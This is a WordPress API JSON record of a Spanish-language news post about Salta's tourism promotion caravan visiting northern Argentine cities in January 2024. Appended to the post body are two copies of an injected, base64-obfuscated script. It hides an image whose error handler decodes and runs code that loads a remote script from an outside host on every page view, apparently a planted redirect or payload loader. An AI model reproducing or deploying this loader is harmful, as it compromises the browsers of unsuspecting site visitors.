{"id":3460,"date":"2024-01-02T17:42:25","date_gmt":"2024-01-02T20:42:25","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=3460"},"modified":"2025-08-14T00:03:01","modified_gmt":"2025-08-14T03:03:01","slug":"la-caravana-de-promocion-de-salta-estara-en-el-norte-argentino-durante-el-mes-de-enero","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=3460","title":{"rendered":"La caravana de promoci\u00f3n de Salta estar\u00e1 en el Norte argentino durante el mes de enero"},"content":{"rendered":"\n<h5 class=\"wp-block-heading has-white-color has-text-color has-background\" style=\"background-color:#8a1734\"><em><strong>El jueves 4 se realizar\u00e1 una presentaci\u00f3n a medios de comunicaci\u00f3n en Tucum\u00e1n y el viernes 5 en Santiago del Estero. El martes 9 ser\u00e1 el turno de Jujuy. En todos los casos se realizar\u00e1n activaciones dirigidas al consumidor final en la v\u00eda p\u00fablica.<\/strong><\/em><\/h5>\n\n\n\n<p>El&nbsp;<strong>Ministerio de Turismo y Deportes<\/strong>&nbsp;iniciar\u00e1 esta semana una caravana de promoci\u00f3n por el Norte argentino, con una estrategia de captar turistas de los mercados de cercan\u00eda, mostrando las experiencias tur\u00edsticas vigentes en el calendario de verano 2024 que incluyen ferias, festivales, productos de aventura y naturaleza, entre otras opciones.<\/p>\n\n\n\n<p>El jueves 4 de enero, el equipo del Ministerio y de la C\u00e1mara de Turismo de Salta estar\u00e1 en San Miguel de Tucum\u00e1n, donde en el hotel Bicentenario, Las Heras 51, se realizar\u00e1 una presentaci\u00f3n de las Experiencias Tur\u00edsticas 2024, dirigidas a medios de prensa locales. &nbsp;En la misma ciudad, de 9 a 14 hs, se realizar\u00e1 una activaci\u00f3n dirigida al consumidor final en la intersecci\u00f3n de peatonal Mu\u00f1ecas y Mendoza.<\/p>\n\n\n\n<p>En tanto, el viernes 5 de enero, ser\u00e1 el turno de Santiago del Estero. En el hotel Altos de Santiago, se realizar\u00e1 id\u00e9ntica presentaci\u00f3n para los medios de comunicaci\u00f3n, que ser\u00e1 tambi\u00e9n, combinada con activaciones en la v\u00eda p\u00fablica. El lugar elegido es la plaza Libertad, en calle Independencia, entre Libertad y Avellaneda y se llevar\u00e1n a cabo el jueves 4 de 18 a 21 hs.<\/p>\n\n\n\n<p>La pr\u00f3xima semana, la comitiva estar\u00e1 en San Salvador de Jujuy. El martes 9, &nbsp;en el hotel Altos de La Vi\u00f1a, se presentar\u00e1n las Experiencias Tur\u00edsticas 2024. Las acciones al consumidor final ser\u00e1n en la plaza Manuel Belgrano, de 9 a 14 hs.<\/p>\n\n\n\n<p>Fuente:\u00a0<strong><em><a href=\"https:\/\/www.salta.gob.ar\/prensa\/noticias\/la-caravana-de-promocion-de-salta-estara-en-el-norte-argentino-durante-el-mes-de-enero-93617\" target=\"_blank\" rel=\"noopener\" title=\"\">Secretar\u00eda de Prensa y Comunicaci\u00f3n<\/a><\/em><\/strong><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>El jueves 4 se realizar\u00e1 una presentaci\u00f3n a medios de comunicaci\u00f3n en Tucum\u00e1n y el viernes 5 en Santiago del Estero. El martes 9 ser\u00e1 el turno de Jujuy. En todos los casos se realizar\u00e1n activaciones dirigidas al consumidor final en la v\u00eda p\u00fablica. El&nbsp;Ministerio de Turismo y Deportes&nbsp;iniciar\u00e1 esta semana una caravana de promoci\u00f3n [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":3461,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[18,17],"tags":[],"class_list":{"0":"post-3460","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-rutas-y-caminos","8":"category-sociales"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3460"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=3460"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3460\/revisions"}],"predecessor-version":[{"id":6886,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3460\/revisions\/6886"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/3461"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=3460"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=3460"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=3460"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}